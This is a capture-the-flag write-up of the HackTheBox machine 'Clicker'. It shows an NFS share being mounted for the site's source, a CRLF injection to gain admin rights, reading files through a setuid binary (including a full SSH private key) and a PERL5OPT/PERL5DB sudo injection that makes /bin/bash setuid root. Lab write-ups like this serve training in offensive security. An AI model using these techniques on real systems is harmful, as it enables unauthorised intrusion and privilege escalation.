Clicker

Posted Nov 18, 2023 Updated Sep 10, 2024

Clicker Machine 🖥️

By Shivendra Prajapati

16 min read

HackTheBox Machine ➡️ Medium #CRLF #NFS #RFI #perl #putty_gen

Description ⤵️

This machine from HackTheBox , is categorized as Medium Level Machine . It focuses into NFS shares , I learned about perl and about web part alot from this machine.

Port Scan Results ⤵️

  
┌──(kali㉿kali)-[~/Downloads/HTB/Clicker]
└─$ sudo nmap -sC -sV -p- -T4 -oN Nmap_Result.txt 10.10.11.232
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-11-18 19:35 IST
Nmap scan report for 10.10.11.232
Host is up (0.16s latency).
Not shown: 65526 closed tcp ports (reset)
PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 89:d7:39:34:58:a0:ea:a1:db:c1:3d:14:ec:5d:5a:92 (ECDSA)
|_  256 b4:da:8d:af:65:9c:bb:f0:71:d5:13:50:ed:d8:11:30 (ED25519)
80/tcp    open  http     Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://clicker.htb/
111/tcp   open  rpcbind  2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      36832/udp   mountd
|   100005  1,2,3      41569/tcp   mountd
|   100005  1,2,3      43997/udp6  mountd
|   100005  1,2,3      51525/tcp6  mountd
|   100021  1,3,4      36385/tcp   nlockmgr
|   100021  1,3,4      38954/udp6  nlockmgr
|   100021  1,3,4      43017/tcp6  nlockmgr
|   100021  1,3,4      54393/udp   nlockmgr
|   100024  1          34209/udp6  status
|   100024  1          41235/tcp6  status
|   100024  1          42573/tcp   status
|   100024  1          60124/udp   status
|   100227  3           2049/tcp   nfs_acl
|_  100227  3           2049/tcp6  nfs_acl
2049/tcp  open  nfs_acl  3 (RPC #100227)
36385/tcp open  nlockmgr 1-4 (RPC #100021)
41569/tcp open  mountd   1-3 (RPC #100005)
42573/tcp open  status   1 (RPC #100024)
55593/tcp open  mountd   1-3 (RPC #100005)
57471/tcp open  mountd   1-3 (RPC #100005)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSF Enumeration ⤵️

Firstly I enumerated the NFS shares through showmount command →

  
┌──(kali㉿kali)-[~/Downloads/HTB/Clicker]
└─$ showmount -e 10.10.11.232
Export list for 10.10.11.232:
/mnt/backups *

Now I have to make a directory for accessing NFS Shares →

  
┌──(kali㉿kali)-[~/Downloads/HTB/Clicker]
└─$ mkdir /tmp/nfs
mkdir: cannot create directory ‘/tmp/nfs’: File exists
                                                                                                                               
┌──(kali㉿kali)-[~/Downloads/HTB/Clicker]
└─$ sudo mount -v -t nfs -o vers=3,proto=tcp,nolock 10.10.11.232:/mnt/backups /tmp/nfs
[sudo] password for kali: 
mount.nfs: timeout set for Sat Nov 18 19:39:48 2023
mount.nfs: trying text-based options 'vers=3,proto=tcp,nolock,addr=10.10.11.232'
mount.nfs: prog 100003, trying vers=3, prot=6
mount.nfs: trying 10.10.11.232 prog 100003 vers 3 prot TCP port 2049
mount.nfs: prog 100005, trying vers=3, prot=6
mount.nfs: trying 10.10.11.232 prog 100005 vers 3 prot TCP port 41569

┌──(kali㉿kali)-[~/Downloads/HTB/Clicker]
└─$ ls -al /tmp/nfs 
total 2240
drwxr-xr-x  2 nobody nogroup    4096 Sep  6 00:49 .
drwxrwxrwt 18 root   root       4096 Nov 18 19:36 ..
-rw-r--r--  1 root   root    2284115 Sep  2 01:57 clicker.htb_backup.zip

Now lets transfer that into the Attackers machine →

  
┌──(kali㉿kali)-[~/Downloads/HTB/Clicker]
└─$ cp /tmp/nfs/clicker.htb_backup.zip .
                                                                                                                               
┌──(kali㉿kali)-[~/Downloads/HTB/Clicker]
└─$ mkdir clicker_backup_zip                             
                                                                                                                               
┌──(kali㉿kali)-[~/Downloads/HTB/Clicker]
└─$ cd clicker_backup_zip               
                                                                                                                               
┌──(kali㉿kali)-[~/Downloads/HTB/Clicker/clicker_backup_zip]
└─$ unzip ../clicker.htb_backup.zip 
Archive:  ../clicker.htb_backup.zip
   creating: clicker.htb/
  inflating: clicker.htb/play.php    
  inflating: clicker.htb/profile.php  
  inflating: clicker.htb/authenticate.php
...
...

┌──(kali㉿kali)-[~/Downloads/HTB/Clicker/clicker_backup_zip]
└─$ cd clicker.htb       
                                                                                                                               
┌──(kali㉿kali)-[~/…/HTB/Clicker/clicker_backup_zip/clicker.htb]
└─$ ls -al         
total 72
drwxr-xr-x 4 kali kali 4096 Sep  2 01:51 .
drwxr-xr-x 3 kali kali 4096 Nov 18 19:39 ..
-rw-rw-r-- 1 kali kali 3934 Sep  2 01:48 admin.php
drwxr-xr-x 4 kali kali 4096 Feb 28  2023 assets
-rw-rw-r-- 1 kali kali  608 Sep  2 01:47 authenticate.php
-rw-rw-r-- 1 kali kali  541 Sep  2 01:47 create_player.php
-rw-rw-r-- 1 kali kali 2536 Sep  2 01:48 db_utils.php
-rw-r--r-- 1 kali kali 1376 Sep  2 01:48 diagnostic.php
-rw-rw-r-- 1 kali kali 1977 Sep  2 01:48 export.php
drwxr-xr-x 2 kali kali 4096 Sep  2 01:48 exports
-rw-rw-r-- 1 kali kali 3887 Sep  2 01:48 index.php
-rw-rw-r-- 1 kali kali 3423 Sep  2 01:48 info.php
-rw-rw-r-- 1 kali kali 3301 Sep  2 01:48 login.php
-rw-rw-r-- 1 kali kali   74 Sep  2 01:47 logout.php
-rw-rw-r-- 1 kali kali 3341 Sep  2 01:47 play.php
-rw-rw-r-- 1 kali kali 3070 Sep  2 01:47 profile.php
-rw-rw-r-- 1 kali kali 3333 Sep  2 01:48 register.php
-rw-rw-r-- 1 kali kali  563 Sep  2 01:48 save_game.php

Now I have a domain name to lets set the /etc/hosts file as clicker.htb and lets enumerate the web part .

Web Enumeration ⤵️

Lets see the webpage first :

Lets register a user first shiva : shiva →

After Login into the site I got 2 options →

I checked the option Play and got 2 parameters as click and level while interceting with burpsuite →

And as I also got those php source code files from NFS share so Lets check the source code what it is for and what else can be done to escalate the privileges from normal user to Admin user →

  
┌──(kali㉿kali)-[~/…/HTB/Clicker/clicker_backup_zip/clicker.htb]
└─$ cat play.php   
<?php
session_start();
if (! $_SESSION["ROLE"]) {
  header('Location: /index.php');
  die;
}
?>

<html>
<head>
<link href="/assets/cover.css" rel="stylesheet">
<link href="/assets/css/bootstrap.min.css" rel="stylesheet">
<style>
  body {
  margin:0px;
}
.center {
  margin: 40px;
}

.round{
  font-size: 12px;
  color: #4D5259;
  line-height: 1.5;
  font-weight: bold;
  padding: .5em 2em;
  background: #FFFFFF;
  border: 2px solid #4D5259;
  box-shadow: 4px 4px 0 0 #4D5259;
  border-radius: 100px;
  outline:0;
  transition: ease all .1s;
} 
.round:active {
  transform: translateY(4px) translateX(4px);
  box-shadow: 0px 0px 0 0 #4D5259;
}

.square {
  font-size: 10px;
  color: #4D5259;
  line-height: 1.5;
  font-weight: bold;
  padding: .5em 2em;
  background: #FFFFFF;
  border: 2px solid #4D5259;
  box-shadow: 4px 4px 0 0 #4D5259;
  outline:0;
}

.square:active {
  transform: translateY(4px) translateX(4px);
  box-shadow: 0px 0px 0 0 #4D5259;
}
.square:hover {
  background: #d3d3d3;
}
</style>
</head>
<title>Clicker - The Game</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">

<body class="h-100 text-light bg-dark">
    <script>
      money = <?php echo $_SESSION["CLICKS"]; ?>;
      update_level = <?php echo $_SESSION["LEVEL"]; ?>;
      money = parseInt(money);
      update_level = parseInt(update_level);
      upgrade_cost = 15 * (5 ** update_level);
      money_increment = upgrade_cost / 15;

      function addcomma(x) {
        return x.toString().replace(/\B(?=(\d{3})+(?!\d))/g, ",")
      }

      function saveAndClose() {
        window.location.replace("/save_game.php?clicks="+money+"&level="+update_level);
      }

      function clicked() {
        money += money_increment;
        document.getElementById("total").innerHTML = "Clicks: " + addcomma(money);
      }

      function upgrade() {
        if (money >= upgrade_cost) {
          money_increment += upgrade_cost / 15;
          money -= upgrade_cost;
          update_level += 1;
          upgrade_cost = upgrade_cost * 5;
          document.getElementById("upgrade").innerHTML = addcomma(update_level) + " - LevelUP Cost: " + addcomma(upgrade_cost);
        }
  

        document.getElementById("click").innerHTML = "Level: " + addcomma(update_level);
        document.getElementById("total").innerHTML = "Clicks: " + addcomma(money);
      }

    </script>
    <br><br>
    <center class='text-center'>
      <h1 id='total'>Clicks: 0</h1>
      <h5 id="click" style="font-family:trebuchet MS;">Level: 0</h5>
      <img class="round" src="assets/cursor.png" width="150" onclick='clicked()'></img>
      <br><br>
      <button id='upgrade' class="round" onclick='upgrade()' style="font-family:courier;">0 - LevelUP cost: 15</button><br><br>
      <button class="square" onclick="saveAndClose()">Save and close</button>
    </center>

    <script>
      document.addEventListener('DOMContentLoaded', function() {
        document.getElementById("upgrade").innerHTML = addcomma(update_level) + " - LevelUP Cost: " + addcomma(upgrade_cost);
        document.getElementById("click").innerHTML = "Level: " + addcomma(update_level);
        document.getElementById("total").innerHTML = "Clicks: " + addcomma(money);
      }, false);
    </script>
  </link>
</body>
</meta>

</html>

In the starting of the session ROLE variable is required so after some enumeration I got to know from authenticate.php file that the ROLE signifies the profile or designation →

  
┌──(kali㉿kali)-[~/…/HTB/Clicker/clicker_backup_zip/clicker.htb]
└─$ cat authenticate.php 
<?php
session_start();
include_once("db_utils.php");

if (isset($_POST['username']) && isset($_POST['password']) && $_POST['username'] != "" && $_POST['password'] != "") {
	if(check_auth($_POST['username'], $_POST['password'])) {
		$_SESSION["PLAYER"] = $_POST["username"];
		$profile = load_profile($_POST["username"]);
		$_SESSION["NICKNAME"] = $profile["nickname"];
		$_SESSION["ROLE"] = $profile["role"];
		$_SESSION["CLICKS"] = $profile["clicks"];
		$_SESSION["LEVEL"] = $profile["level"];
		header('Location: /index.php');
	}
	else {
		header('Location: /login.php?err=Authentication Failed');
	}
}
?>

so lets try to provide the role value as Admin so that the user shiva can be authenticated as Admin user →

It gives an error as Malicious activity detected! and After trying so many things I used the CRLF (%0D%0A) Injection to invade this error and bypass this Error Detection →

After Forwording the request I received Success message →

Now I Logged out of the site and relogin as same user and Now I have Adminstrator privileges →

Lets see the Content of Adminstration →

I have 3 Keys and its values Nickname , Click , and Level and I have the option to export the file in a format so lets include the RFI payload in a nickname and Export that document in php format →

It was successfully responded , Now I have to export in php format and then I will be tring RFI (Remote File Inclusion) method in it →

Now I got this URL exports/File_name.php I will be tring RFI on it →

Now I can have a shell here →

In response to that I have a shell →

  
www-data@clicker:/var/www/clicker.htb/exports$ whoami
www-data
www-data@clicker:/var/www/clicker.htb/exports$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@clicker:/var/www/clicker.htb/exports$ cd /home
www-data@clicker:/home$ ls
jack
www-data@clicker:/home$ cd jack
bash: cd: jack: Permission denied
www-data@clicker:/home$ cd /opt
www-data@clicker:/opt$ ls
manage	monitor.sh
www-data@clicker:/opt$ 
www-data@clicker:/opt$ cd manage
www-data@clicker:/opt/manage$ ls -al
total 28
drwxr-xr-x 2 jack jack  4096 Jul 21 22:29 .
drwxr-xr-x 3 root root  4096 Jul 20 10:00 ..
-rw-rw-r-- 1 jack jack   256 Jul 21 22:29 README.txt
-rwsrwsr-x 1 jack jack 16368 Feb 26  2023 execute_query
www-data@clicker:/opt/manage$

this file execute_query is a binary executable file so lets see what is does according to README.txt file it does these workes →

  
www-data@clicker:/opt/manage$ cat README.txt 
Web application Management

Use the binary to execute the following task:
	- 1: Creates the database structure and adds user admin
	- 2: Creates fake players (better not tell anyone)
	- 3: Resets the admin password
	- 4: Deletes all users except the admin
www-data@clicker:/opt/manage$

Through Inspection It does these workes →

The values denotes the options that will work upon it →

so option 5 is File not readable or not found that indicated that it will be accessing documents so lets access some information like private keys and /etc/passwd values through this →

  
www-data@clicker:/opt/manage$ ./execute_query 5 ../../../etc/passwd
mysql: [Warning] Using a password on the command line interface can be insecure.
--------------
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
syslog:x:107:113::/home/syslog:/usr/sbin/nologin
uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
jack:x:1000:1000:jack:/home/jack:/bin/bash
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:114:120:MySQL Server,,,:/nonexistent:/bin/false
_rpc:x:115:65534::/run/rpcbind:/usr/sbin/nologin
statd:x:116:65534::/var/lib/nfs:/usr/sbin/nologin
_laurel:x:998:998::/var/log/laurel:/bin/false
--------------

ERROR 1064 (42000) at line 1: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
' at line 1
www-data@clicker:/opt/manage$

Now the private key value →

  
www-data@clicker:/opt/manage$ ./execute_query 5 ../.ssh/id_rsa
mysql: [Warning] Using a password on the command line interface can be insecure.
--------------
-----BEGIN OPENSSH PRIVATE KEY---
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
-----END OPENSSH PRIVATE KEY---
--------------

ERROR 1064 (42000) at line 1: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-----BEGIN OPENSSH PRIVATE KEY---
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAA' at line 1
www-data@clicker:/opt/manage$

Now I copied the Private key to my Attackers machine but it is not in format of id_rsa so I compared it with my own Private key and corrected the format there .

But still I got this error →

  
┌──(kali㉿kali)-[~/Downloads/HTB/Clicker]
└─$ ssh -i id_rsa jack@10.10.11.232
Load key "id_rsa": error in libcrypto
jack@10.10.11.232's password:

So I researched on web related to this error resolve and I found a command that will convert the format in its asking format like this →

I was getting error when my format of id_rsa was not resolved →

  
┌──(kali㉿kali)-[~/Downloads/HTB/Clicker]
└─$ sudo puttygen id_rsa -O private-openssh -o id_rsa.conv
puttygen: error loading `id_rsa': file does not begin with OpenSSH new-style key header

After correction in my format I rerun the command and it worked and I got this id_rsa.conv private key I set the permissions as chmod 600 id_rsa.conv after that →

  
┌──(kali㉿kali)-[~/Downloads/HTB/Clicker]
└─$ sudo puttygen id_rsa -O private-openssh -o id_rsa.conv

SSH Shell ⤵️

  
┌──(root㉿kali)-[/home/kali/Downloads/HTB/Clicker]
└─# ssh -i id_rsa.conv jack@10.10.11.232
The authenticity of host '10.10.11.232 (10.10.11.232)' can not be established.
ED25519 key fingerprint is SHA256:OAOlD4te1rIAd/MBDNbXq9MuDWSFoc6Jc3eaBCC5u7o.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.232' (ED25519) to the list of known hosts.
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-84-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon Nov 20 08:45:20 AM UTC 2023

  System load:           0.0
  Usage of /:            53.5% of 5.77GB
  Memory usage:          16%
  Swap usage:            0%
  Processes:             244
  Users logged in:       0
  IPv4 address for eth0: 10.10.11.232
  IPv6 address for eth0: dead:beef::250:56ff:feb9:4cf4

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

jack@clicker:~$

Now I have a proper shell so lets dig deeper →

  
jack@clicker:/$ sudo -l
Matching Defaults entries for jack on clicker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User jack may run the following commands on clicker:
    (root) SETENV: NOPASSWD: /opt/monitor.sh
jack@clicker:/$

I found that this file /opt/monitor.sh is using /usr/bin/xml_pp command and this command basically works though perl →

  
jack@clicker:/$ cat /opt/monitor.sh 
#!/bin/bash
if [ "$EUID" -ne 0 ]
  then echo "Error, please run as root"
  exit
fi

set PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
unset PERL5LIB;
unset PERLLIB;

data=$(/usr/bin/curl -s http://clicker.htb/diagnostic.php?token=secret_diagnostic_token);
/usr/bin/xml_pp <<< $data;
if [[ $NOSAVE == "true" ]]; then
    exit;
else
    timestamp=$(/usr/bin/date +%s)
    /usr/bin/echo $data > /root/diagnostic_files/diagnostic_${timestamp}.xml
fi
jack@clicker:/$

This /usr/bin/xml_pp command is using perl language and after some recon I got the exploit for escalating the privileges to root →

  
jack@clicker:/$ cat /usr/bin/xml_pp
#!/usr/bin/perl -w
# $Id: /xmltwig/trunk/tools/xml_pp/xml_pp 32 2008-01-18T13:11:52.128782Z mrodrigu  $
use strict;

use XML::Twig;
use File::Temp qw/tempfile/;
use File::Basename qw/dirname/;

my @styles= XML::Twig->_pretty_print_styles; # from XML::Twig
my $styles= join '|', @styles;               # for usage
my %styles= map { $_ => 1} @styles;          # to check option

my $DEFAULT_STYLE= 'indented';

my $USAGE= "usage: $0 [-v] [-i<extension>] [-s ($styles)] [-p <tag(s)>] [-e <encoding>] [-l] [-f <file>] [<files>]";

# because of the -i.bak option I don't think I can use one of the core
# option processing modules, so it's custom handling and no clusterization :--(
...
...

I used this exploit perl_startup that exploit works on Perl injection vulnerability →

https://www.exploit-db.com/exploits/39702

  
jack@clicker:/$ ls -al /bin/bash
-rwxr-xr-x 1 root root 1396520 Jan  6  2022 /bin/bash
jack@clicker:/$ sudo PERL5OPT=-d PERL5DB='exec "chmod u+s /bin/bash"' /opt/monitor.sh
Statement unlikely to be reached at /usr/bin/xml_pp line 9.
	(Maybe you meant system() when you said exec()?)
jack@clicker:/$ ls -al /bin/bash
-rwsr-xr-x 1 root root 1396520 Jan  6  2022 /bin/bash
jack@clicker:/$ /bin/bash -p
bash-5.1# whoami
root
bash-5.1# id
uid=1000(jack) gid=1000(jack) euid=0(root) groups=1000(jack),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev)
bash-5.1# cd /root
bash-5.1# ls -al
total 40
drwx------  7 root root 4096 Sep  6 12:40 .
drwxr-xr-x 18 root root 4096 Sep  5 19:19 ..
lrwxrwxrwx  1 root root    9 Sep  5 18:46 .bash_history -> /dev/null
-rw-r--r--  1 root root 3106 Oct 15  2021 .bashrc
drwx------  2 root root 4096 Feb 25  2023 .cache
drwxr-xr-x  2 root root 4096 Nov 20 09:16 diagnostic_files
drwxr-xr-x  3 root root 4096 Feb 25  2023 .local
lrwxrwxrwx  1 root root    9 Sep  6 12:30 .mysql_history -> /dev/null
-rw-r--r--  1 root root  193 Feb 27  2023 .profile
drwxr-xr-x  2 root root 4096 Sep  5 19:19 restore
-rw-r-----  1 root root   33 Nov 19 23:11 root.txt
drwx------  2 root root 4096 Sep  6 12:36 .ssh
bash-5.1# cat root.txt
ac684e5dab6e8838569f079935515914
bash-5.1#

Now I am root !!

If you have any questions or suggestions, please leave a comment below. Thank You !

HackTheBox

This post is licensed under CC BY 4.0 by the author.